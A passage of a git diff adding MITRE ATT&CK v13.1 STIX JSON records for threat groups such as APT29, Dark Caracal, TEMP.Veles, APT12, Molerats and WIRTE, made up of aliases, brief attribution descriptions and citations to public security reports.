Crowdstrike DNC June 2016)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: CrowdStrike StellarParticle January 2022)" + }, + { + "source_name": "StellarParticle", + "description": "(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: CrowdStrike StellarParticle January 2022)" + }, + { + "source_name": "The Dukes", + "description": "(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)" + }, + { + "source_name": "APT29", + "description": "(Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)" + }, + { + "source_name": "UNC2452", + "description": "(Citation: FireEye SUNBURST Backdoor December 2020)" + }, + { + "source_name": "YTTRIUM", + "description": "(Citation: Microsoft Unidentified Dec 2018)" + }, + { + "source_name": "NOBELIUM", + "description": "(Citation: MSTIC NOBELIUM Mar 2021)(Citation: MSTIC NOBELIUM May 2021)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: MSRC Nobelium June 2021)" + }, + { + "source_name": "Blue Kitsune", + "description": "(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)" + }, + { + "source_name": "IRON HEMLOCK", + "description": "(Citation: Secureworks IRON HEMLOCK Profile)" + }, + { + "source_name": "IRON RITUAL", + "description": "(Citation: Secureworks IRON RITUAL Profile)" + }, + { + "source_name": "NobleBaron", + "description": "(Citation: SentinelOne NobleBaron June 2021)" + }, + { + "source_name": "SolarStorm", + "description": "(Citation: Unit 42 SolarStorm December 2020)" + }, + { + "source_name": "Dark Halo", + "description": "(Citation: Volexity SolarWinds)" + }, + { + "source_name": "Crowdstrike DNC June 2016", + "description": "Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.", + "url": "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + }, + { + "source_name": "Volexity SolarWinds", + "description": "Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.", + "url": "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/" + }, + { + "source_name": "CrowdStrike SUNSPOT Implant January 2021", + "description": "CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021.", + "url": "https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/" + }, + { + "source_name": "CrowdStrike StellarParticle January 2022", + "description": "CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.", + "url": "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/" + }, + { + "source_name": "GRIZZLY STEPPE JAR", + "description": "Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE \u2013 Russian Malicious Cyber Activity. Retrieved January 11, 2017.", + "url": "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf" + }, + { + "source_name": "FireEye APT29 Nov 2018", + "description": "Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html" + }, + { + "source_name": "F-Secure The Dukes", + "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" + }, + { + "source_name": "ESET Dukes October 2019", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf" + }, + { + "source_name": "FireEye SUNBURST Backdoor December 2020", + "description": "FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" + }, + { + "source_name": "SentinelOne NobleBaron June 2021", + "description": "Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.", + "url": "https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/" + }, + { + "source_name": "Microsoft Unidentified Dec 2018", + "description": "Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.", + "url": "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/" + }, + { + "source_name": "MSTIC NOBELIUM May 2021", + "description": "Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.", + "url": "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/" + }, + { + "source_name": "MSRC Nobelium June 2021", + "description": "MSRC. (2021, June 25). New Nobelium activity. Retrieved August 4, 2021.", + "url": "https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/" + }, + { + "source_name": "MSTIC Nobelium Toolset May 2021", + "description": "MSTIC. (2021, May 28). Breaking down NOBELIUM\u2019s latest early-stage toolset. Retrieved August 4, 2021.", + "url": "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/" + }, + { + "source_name": "MSTIC NOBELIUM Mar 2021", + "description": "Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM\u2019s layered persistence. Retrieved March 8, 2021.", + "url": "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/" + }, + { + "source_name": "NCSC APT29 July 2020", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf" + }, + { + "source_name": "Cybersecurity Advisory SVR TTP May 2021", + "description": "NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021.", + "url": "https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf" + }, + { + "source_name": "NSA Joint Advisory SVR SolarWinds April 2021", + "description": "NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021.", + "url": "https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF" + }, + { + "source_name": "PWC WellMess C2 August 2020", + "description": "PWC. (2020, August 17). WellMess malware: analysis of its Command and Control (C2) server. Retrieved September 29, 2020.", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html" + }, + { + "source_name": "PWC WellMess July 2020", + "description": "PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020.", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html" + }, + { + "source_name": "Secureworks IRON HEMLOCK Profile", + "description": "Secureworks CTU. (n.d.). IRON HEMLOCK. Retrieved February 22, 2022.", + "url": "http://www.secureworks.com/research/threat-profiles/iron-hemlock" + }, + { + "source_name": "Secureworks IRON RITUAL Profile", + "description": "Secureworks CTU. (n.d.). IRON RITUAL. Retrieved February 24, 2022.", + "url": "https://www.secureworks.com/research/threat-profiles/iron-ritual" + }, + { + "source_name": "UK Gov Malign RIS Activity April 2021", + "description": "UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021.", + "url": "https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services" + }, + { + "source_name": "UK Gov UK Exposes Russia SolarWinds April 2021", + "description": "UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . Retrieved April 16, 2021.", + "url": "https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise" + }, + { + "source_name": "UK NSCS Russia SolarWinds April 2021", + "description": "UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.", + "url": "https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise" + }, + { + "source_name": "Unit 42 SolarStorm December 2020", + "description": "Unit 42. (2020, December 23). SolarStorm Supply Chain Attack Timeline. Retrieved March 24, 2023.", + "url": "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline/" + }, + { + "source_name": "White House Imposing Costs RU Gov April 2021", + "description": "White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021.", + "url": "https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12.json new file mode 100644 index 0000000000000000000000000000000000000000..c3c29927b494fc5817c933e538d95cc28f52aca6 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--ff11f165-ddf4-49eb-a0d1-ab6cfbf38e7b", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Dark Caracal" + ], + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12", + "type": "intrusion-set", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0070", + "external_id": "G0070" + }, + { + "source_name": "Dark Caracal", + "description": "(Citation: Lookout Dark Caracal Jan 2018)" + }, + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2021-10-11T19:08:18.503Z", + "name": "Dark Caracal", + "description": "[Dark Caracal](https://attack.mitre.org/groups/G0070) is threat group that has been attributed to the Lebanese General Directorate of General Security (GDGS) and has operated since at least 2012. (Citation: Lookout Dark Caracal Jan 2018)", + "x_mitre_version": "1.3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4.json new file mode 100644 index 0000000000000000000000000000000000000000..054419404c0ab5708ee0703511e82a15997ea339 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4.json @@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--5b506e91-b364-435e-bafa-816ad0b6d7e2", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-11-30T22:46:40.135Z", + "name": "TEMP.Veles", + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing [TRITON](https://attack.mitre.org/software/S0609), a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019)", + "aliases": [ + "TEMP.Veles", + "XENOTIME" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.3", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "created": "2019-04-16T15:14:38.533Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0088", + "external_id": "G0088" + }, + { + "source_name": "TEMP.Veles", + "description": "(Citation: FireEye TRITON 2019)" + }, + { + "source_name": "Dragos Xenotime 2018", + "description": "Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019.", + "url": "https://dragos.com/resource/xenotime/" + }, + { + "source_name": "FireEye TEMP.Veles 2018", + "description": "FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html" + }, + { + "source_name": "FireEye TRITON 2019", + "description": "Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html" + }, + { + "source_name": "FireEye TEMP.Veles JSON April 2019", + "description": "Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html" + }, + { + "source_name": "Pylos Xenotime 2019", + "description": "Slowik, J.. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019.", + "url": "https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/" + }, + { + "source_name": "XENOTIME", + "description": "The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind [TRITON](https://attack.mitre.org/software/S0609).(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--ae41895a-243f-4a65-b99b-d85022326c31.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--ae41895a-243f-4a65-b99b-d85022326c31.json new file mode 100644 index 0000000000000000000000000000000000000000..93395010f96ccbd66c16f6793704e5ea75453234 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--ae41895a-243f-4a65-b99b-d85022326c31.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--89972034-bbd1-4ab4-a8bb-526c127c02bf", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-29T21:28:39.974Z", + "name": "Dust Storm", + "description": "[Dust Storm](https://attack.mitre.org/groups/G0031) is a threat group that has targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. (Citation: Cylance Dust Storm)", + "aliases": [ + "Dust Storm" + ], + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "type": "intrusion-set", + "id": "intrusion-set--ae41895a-243f-4a65-b99b-d85022326c31", + "created": "2017-05-31T21:32:03.306Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0031", + "external_id": "G0031" + }, + { + "source_name": "Dust Storm", + "description": "(Citation: Cylance Dust Storm)" + }, + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--c47f937f-1022-4f42-8525-e7a4779a14cb.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--c47f937f-1022-4f42-8525-e7a4779a14cb.json new file mode 100644 index 0000000000000000000000000000000000000000..0068a40ff6931df688486e4a51397c0637a842f1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--c47f937f-1022-4f42-8525-e7a4779a14cb.json @@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--a6274d88-9b44-4086-b599-8d5ae87a2c75", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "APT12", + "IXESHE", + "DynCalc", + "Numbered Panda", + "DNSCALC" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--c47f937f-1022-4f42-8525-e7a4779a14cb", + "type": "intrusion-set", + "created": "2017-05-31T21:31:47.537Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0005", + "external_id": "G0005" + }, + { + "source_name": "APT12", + "description": "(Citation: Meyers Numbered Panda) (Citation: Moran 2014)" + }, + { + "source_name": "IXESHE", + "description": "(Citation: Meyers Numbered Panda) (Citation: Moran 2014)" + }, + { + "source_name": "DynCalc", + "description": "(Citation: Meyers Numbered Panda) (Citation: Moran 2014)" + }, + { + "source_name": "Numbered Panda", + "description": "(Citation: Meyers Numbered Panda)" + }, + { + "source_name": "DNSCALC", + "description": "(Citation: Moran 2014)" + }, + { + "source_name": "Meyers Numbered Panda", + "description": "Meyers, A. (2013, March 29). Whois Numbered Panda. Retrieved January 14, 2016.", + "url": "http://www.crowdstrike.com/blog/whois-numbered-panda/" + }, + { + "source_name": "Moran 2014", + "description": "Moran, N., Oppenheim, M., Engle, S., & Wartell, R.. (2014, September 3). Darwin\u2019s Favorite APT Group [Blog]. Retrieved November 12, 2014.", + "url": "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" + } + ], + "modified": "2020-03-30T18:44:59.268Z", + "name": "APT12", + "description": "[APT12](https://attack.mitre.org/groups/G0005) is a threat group that has been attributed to China. The group has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments.(Citation: Meyers Numbered Panda)", + "x_mitre_version": "2.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--d1acfbb3-647b-4723-9154-800ec119006e.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--d1acfbb3-647b-4723-9154-800ec119006e.json new file mode 100644 index 0000000000000000000000000000000000000000..5616d94afdd6707f6a464ce2f4bafbc97dc0fc95 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--d1acfbb3-647b-4723-9154-800ec119006e.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--f767d99b-cb8f-4302-9f04-4ac0aad4a9ad", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Sowbug" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Alan Neville, @abnev" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--d1acfbb3-647b-4723-9154-800ec119006e", + "type": "intrusion-set", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0054", + "external_id": "G0054" + }, + { + "source_name": "Sowbug", + "description": "(Citation: Symantec Sowbug Nov 2017)" + }, + { + "url": "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments", + "description": "Symantec Security Response. (2017, November 7). Sowbug: Cyber espionage group targets South American and Southeast Asian governments. Retrieved November 16, 2017.", + "source_name": "Symantec Sowbug Nov 2017" + } + ], + "modified": "2020-03-30T02:46:16.483Z", + "name": "Sowbug", + "description": "[Sowbug](https://attack.mitre.org/groups/G0054) is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia, particularly government entities, since at least 2015. (Citation: Symantec Sowbug Nov 2017)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411.json new file mode 100644 index 0000000000000000000000000000000000000000..6e7bd08d0fbcbbdb0698697cb2fe93336a6c8ec7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411.json @@ -0,0 +1,73 @@ +{ + "type": "bundle", + "id": "bundle--61244bff-6bf2-472b-aade-61c5c9175b57", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Molerats", + "Operation Molerats", + "Gaza Cybergang" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411", + "type": "intrusion-set", + "created": "2017-05-31T21:31:55.093Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0021", + "url": "https://attack.mitre.org/groups/G0021", + "source_name": "mitre-attack" + }, + { + "source_name": "Molerats", + "description": "(Citation: DustySky)" + }, + { + "source_name": "Operation Molerats", + "description": "(Citation: FireEye Operation Molerats)(Citation: Cybereason Molerats Dec 2020)" + }, + { + "source_name": "Gaza Cybergang", + "description": "(Citation: DustySky)(Citation: Kaspersky MoleRATs April 2019)(Citation: Cybereason Molerats Dec 2020)" + }, + { + "source_name": "DustySky", + "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.", + "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf" + }, + { + "url": "http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf", + "description": "ClearSky Cybersecurity. (2016, June 9). Operation DustySky - Part 2. Retrieved August 3, 2016.", + "source_name": "DustySky2" + }, + { + "source_name": "Kaspersky MoleRATs April 2019", + "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/", + "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020." + }, + { + "source_name": "Cybereason Molerats Dec 2020", + "url": "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", + "description": "Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020." + }, + { + "source_name": "FireEye Operation Molerats", + "description": "Villeneuve, N., Haq, H., Moran, N. (2013, August 23). OPERATION MOLERATS: MIDDLE EAST CYBER ATTACKS USING POISON IVY. Retrieved April 1, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html" + } + ], + "modified": "2021-04-27T20:16:16.057Z", + "name": "Molerats", + "description": "[Molerats](https://attack.mitre.org/groups/G0021) is an Arabic-speaking, politically-motivated threat group that has been operating since 2012. The group's victims have primarily been in the Middle East, Europe, and the United States.(Citation: DustySky)(Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)(Citation: Cybereason Molerats Dec 2020)", + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--f8cb7b36-62ef-4488-8a6d-a7033e3271c1.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--f8cb7b36-62ef-4488-8a6d-a7033e3271c1.json new file mode 100644 index 0000000000000000000000000000000000000000..bba6fc889f6288481ac7ea4e4eafc3e3700d9c34 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--f8cb7b36-62ef-4488-8a6d-a7033e3271c1.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--22374c1b-05df-453b-85f3-e36b73f7ed0d", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "WIRTE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Lab52 by S2 Grupo" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--f8cb7b36-62ef-4488-8a6d-a7033e3271c1", + "created": "2019-05-24T17:02:44.226Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G0090", + "url": "https://attack.mitre.org/groups/G0090" + }, + { + "source_name": "WIRTE", + "description": "(Citation: Lab52 WIRTE Apr 2019)" + }, + { + "source_name": "Lab52 WIRTE Apr 2019", + "url": "https://lab52.io/blog/wirte-group-attacking-the-middle-east/", + "description": "S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019." + }, + { + "source_name": "Kaspersky WIRTE November 2021", + "url": "https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044", + "description": "Yamout, M. (2021, November 29). WIRTE\u2019s campaign in the Middle East \u2018living off the land\u2019 since at least 2019. Retrieved February 1, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[WIRTE](https://attack.mitre.org/groups/G0090) is a threat group that has been active since at least August 2018. [WIRTE](https://attack.mitre.org/groups/G0090) has targeted government, diplomatic, financial, military, legal, and technology organizations in the Middle East and Europe.(Citation: Lab52 WIRTE Apr 2019)(Citation: Kaspersky WIRTE November 2021)", + "modified": "2022-04-15T19:50:19.478Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "WIRTE", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--f9c06633-dcff-48a1-8588-759e7cec5694.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--f9c06633-dcff-48a1-8588-759e7cec5694.json new file mode 100644 index 0000000000000000000000000000000000000000..79c3c01cc79ce81c0dbf8dcf627fd3bfe47fcced --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--f9c06633-dcff-48a1-8588-759e7cec5694.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--a39b458c-2ec1-4b4a-bc07-79bb98347bf5", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "PLATINUM" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Ryan Becwar" + ], + "object_marking_refs": [ + 